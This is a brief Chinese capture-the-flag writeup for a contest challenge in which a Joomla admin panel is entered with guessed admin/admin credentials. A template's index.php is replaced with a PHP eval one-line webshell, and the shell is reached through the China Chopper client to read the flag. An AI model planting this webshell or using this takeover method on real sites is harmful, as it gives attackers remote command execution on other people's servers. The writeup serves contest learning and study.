“360企业安全春秋杯”网络安全技术大赛—-线上赛题(一)Writeup
主体思路
利用joomla选择模板并且能自己编写网页文件的漏洞,将一句话木马写入网页中,之后菜刀连接拿到shell
具体实现
1.首先第一步用御剑扫描目标主机后台,发现administrator登陆界面,猜测用户名密码均为admin,成功进入后台管理界面
2.点击Extensions中的templates进入选择模板界面这里选择第一个模板
3.之后发现模板文件可以修改,将index.php清空并写入一句话
1 | <?php eval($_POST[cmd]);?> |
4.点击save&close之后退到templates选择界面,点击左侧styles将之前做更改的模板选上星,表示选中模板。
5.打开中国菜刀,输入指定ip和密码,也就是cmd,成功拿到shell
6.查看C盘下的flag